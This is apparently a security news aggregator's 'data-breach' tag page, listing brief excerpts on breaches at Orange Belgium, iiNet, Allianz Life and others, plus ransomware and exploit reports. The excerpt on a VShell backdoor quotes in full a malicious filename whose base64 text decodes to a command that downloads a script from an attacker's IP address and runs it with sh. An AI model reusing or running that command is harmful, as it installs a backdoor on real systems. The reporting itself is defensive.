Tag: data-breach
-
70,000 WordPress Sites Exposed by Inspiro Theme Security Flaw
A critical security vulnerability, officially tracked as CVE-2025-8592, has been identified in the popular Inspiro WordPress theme. The flaw, affecting over 70,000 active installations, enables unauthenticated attackers to exploit a Cross-Site Request Forgery (CSRF) vulnerability that could allow arbitrary plugin installations without user consent. First seen on thecyberexpress.com Jump to article: thecyberexpress.com/csrf-flaw-cve-2025-8592/
-
Colt Discloses Breach After Warlock Ransomware Group Puts Files Up for Sale
Colt Technology Services confirmed a data breach by the WarLock ransomware group; the company is working to restore disrupted systems. Colt Technology Services confirmed that threat actors breached its systems and stole some data. The telecoms company is working to restore disrupted systems. Colt, officially known as Colt Technology Services Group Limited, is a multinational telecommunications…
-
Stealth Threat Unpacked: Weaponized RAR Files Deliver VShell Backdoor on Linux Systems
Trellix Advanced Research Center has exposed an infection chain that weaponises nothing more than a filename to compromise Linux hosts. A spam message masquerading as a beauty-product survey offers a small reward and carries a RAR archive, yy.rar. When unpacked, the archive drops a single file whose name is a miniature Bash program: ziliao2.pdf{echo,KGN1cmwgLWZzU0wgLW0xODAgaHR0cDovLzQ3Ljk4LjE5NC42MDo4MDg0L3Nsd3x8d2dldCAtVDE4MCAtcSBodHRwOi8vNDcuOTguMTk0LjYwOjgwODQvc2x3KXxzaCAg}_{base64,-d}_bash The…
-
What is the cost of a data breach?
Tags: access, ai, api, attack, automation, breach, business, ciso, compliance, cyber, cyberattack, cybersecurity, data, data-breach, detection, finance, fraud, healthcare, ibm, identity, incident response, india, infrastructure, insurance, intelligence, jobs, law, metric, privacy, programming, ransom, ransomware, regulation, risk, security-incident, service, skills, software, supply-chain, technology, theft, threat, tool, vulnerabilityCanada ($4.84 million) and the UK ($4.14million) remain in the top 10 hardest hit, with ASEAN or Association of Southeast Asian Nations ($3.67 million), Australia ($2.55 million), and India ($2.51 million) among the top 15. Breaches by industry: Healthcare remains the industry hit with the highest costs per breach by far, at $7.42 million despite…
-
Orange Belgium July data breach impacted 850,000 customers
Orange Belgium revealed that a July attack resulted in the exposure of the information of 850,000 customer accounts. Orange Belgium announced that 850,000 customer accounts were impacted by a July data breach. Threat actors had access to one of the IT systems containing customers data, including surname, first name, telephone number, SIM card number, PUK…
-
Qilin Ransomware Gang Claims 4TB Data Breach at Nissan CBI
Qilin ransomware claims a 4TB data breach at Nissan CBI, leaking car design files, financial data, 3D models,… First seen on hackread.com Jump to article: hackread.com/qilin-ransomware-gang-4tb-data-breach-nissan-cbi/
-
Orange Belgium mega-breach exposes 850K customers to serious fraud
Everything a criminal needs for targeted attacks exposed, but telco insists ‘no critical data compromised’ First seen on theregister.com Jump to article: www.theregister.com/2025/08/21/orange_belgium_breach/
-
Hackers who exposed North Korean government hacker explain why they did it
The two self-described hacktivists said they had access to the North Korean spy’s computer for around four months before deciding what they had found should be made public. First seen on techcrunch.com Jump to article: techcrunch.com/2025/08/21/hackers-who-exposed-north-korean-government-hacker-explain-why-they-did-it/
-
Nearly 1M SSNs and Health Records Exposed in Marijuana Patient Database
Tags: data-breachOhio Medical Alliance exposed a medical marijuana patient database containing 957,000 records, including SSNs, IDs, health files, and… First seen on hackread.com Jump to article: hackread.com/ssns-health-records-exposed-marijuana-patient-database/
-
AWS Trusted Advisor flaw allowed public S3 buckets to go unflagged
AWS’s Trusted Advisor tool, which is supposed to warn customers if their (cloud) S3 storage buckets are publicly exposed, could be >>tricked
-
Orange Data Breach Raises SIM-Swapping Attack Fears
Orange Belgium revealed that a threat actor has compromised 850,000 customer accounts, with SIM card numbers among the data accessed First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/orange-data-breach-sim-swapping/
-
Orange Belgium discloses data breach impacting 850,000 customers
Orange Belgium, a subsidiary of telecommunications giant Orange Group, disclosed on Wednesday that attackers who breached its systems in July have stolen the data of approximately 850,000 customers. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/orange-belgium-discloses-data-breach-impacting-850-000-customers/
-
Datenleck bei Grok: Hunderttausende private KI-Chats im Netz
Elon Musks Chatbot Grok macht Nutzergespräche über Google auffindbar – darunter Anleitungen für Drogen und Bomben. First seen on golem.de Jump to article: www.golem.de/news/datenleck-bei-grok-hunderttausende-private-ki-chats-im-netz-2508-199380.html
-
‘Limited’ data leak at Aussie telco turns out to be 280K customer details
iiNet breach blamed on single stolen login, with emails, phone numbers, and addresses exposed First seen on theregister.com Jump to article: www.theregister.com/2025/08/20/tpg_telecom_iinet_breach/
-
Legitimate Chrome VPN with 100K+ Installs Secretly Captures Screenshots and Exfiltrates Sensitive Data
A Chrome extension marketed as FreeVPN.One, boasting over 100,000 installations, a verified badge, and featured placement in the Chrome Web Store, has been exposed as spyware that silently captures screenshots of users’ browsing activities and exfiltrates them to remote servers. Despite its privacy policy explicitly stating that the developer does not collect or use user…
-
The 6 challenges your business will face in implementing MLSecOps
Organizations that don’t adapt their security programs as they implement AI run the risk of being exposed to a variety of threats, both old and emerging ones. MLSecOps … First seen on helpnetsecurity.com Jump to article: www.helpnetsecurity.com/2025/08/20/mlsecops-security-challenges/
-
47,000 Individuals Affected by Data Breach, Reveals NY Business Council
The Business Council of New York State, Inc., a prominent commercial organization based in Albany, has disclosed a data breach impacting approximately 47,329 individuals. The breach, characterized as an external system intrusion commonly associated with sophisticated hacking techniques, occurred on February 24, 2025, but was only detected on August 4, 2025 a delay of over…
-
Business Council of New York State says nearly 50,000 had data leaked in February cyberattack
The Business Council of New York State, which works with more than 3,000 organizations, told regulators in multiple states that it suffered a cyberattack in February. First seen on therecord.media Jump to article: therecord.media/new-york-business-council-data-breach
-
Australian ISP iiNet Reports Data Breach, Customer Accounts Stolen
Australian ISP iiNet confirms data breach as hackers stole 280,000 email accounts, phone numbers and user data using… First seen on hackread.com Jump to article: hackread.com/australia-isp-iinet-data-breach-customer-accounts-stolen/
-
Highly Sensitive Medical Cannabis Patient Data Exposed by Unsecured Database
Nearly a million records, which appear to be linked to a medical cannabis card company in Ohio, included Social Security numbers, government IDs, health conditions, and more. First seen on wired.com Jump to article: www.wired.com/story/highly-sensitive-medical-cannabis-patient-data-exposed-by-unsecured-database/
-
Highly Sensitive Medical Cannabis Patient Data Exposed by Unsecured Database
Nearly a million records, which appear to be linked to a medical cannabis card company in Ohio, included Social Security numbers, government IDs, health conditions, and more. First seen on wired.com Jump to article: www.wired.com/story/highly-sensitive-medical-cannabis-patient-data-exposed-by-unsecured-database/
-
Allianz Life Data Breach Exposes Personal Data of 1.1 Million Customers
A cyber-attack on Allianz Life, linked to the ShinyHunters group, has exposed the personal information of 1.1 million customers First seen on infosecurity-magazine.com Jump to article: www.infosecurity-magazine.com/news/allianz-life-breach-exposes/
-
How We Exploited CodeRabbit: From a Simple PR to RCE and Write Access on 1M Repositories
In this blog post, we explain how we got remote code execution (RCE) on CodeRabbit’s production servers, leaked their API tokens and secrets, how we First seen on research.kudelskisecurity.com Jump to article: research.kudelskisecurity.com/2025/08/19/how-we-exploited-coderabbit-from-a-simple-pr-to-rce-and-write-access-on-1m-repositories/
-
NY Business Council discloses data breach affecting 47,000 people
The Business Council of New York State (BCNYS) has revealed that attackers who breached its network in February stole the personal, financial, and health information of over 47,000 individuals. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/business-council-of-new-york-state-discloses-data-breach-affecting-47-000-people/
-
NY Business Council discloses data breach affecting 47,000 people
The Business Council of New York State (BCNYS) has revealed that attackers who breached its network in February stole the personal, financial, and health information of over 47,000 individuals. First seen on bleepingcomputer.com Jump to article: www.bleepingcomputer.com/news/security/business-council-of-new-york-state-discloses-data-breach-affecting-47-000-people/
-
SAP 0-Day Exploit Reportedly Leaked by ShinyHunters Hackers
A sophisticated exploit targeting critical SAP vulnerabilities has been publicly released by the notorious hacking group ShinyHunters, significantly escalating the threat landscape for enterprise SAP environments. The exploit, which chains together multiple zero-day vulnerabilities, was allegedly leaked through the >>Scattered LAPSUS$ Hunters ShinyHunters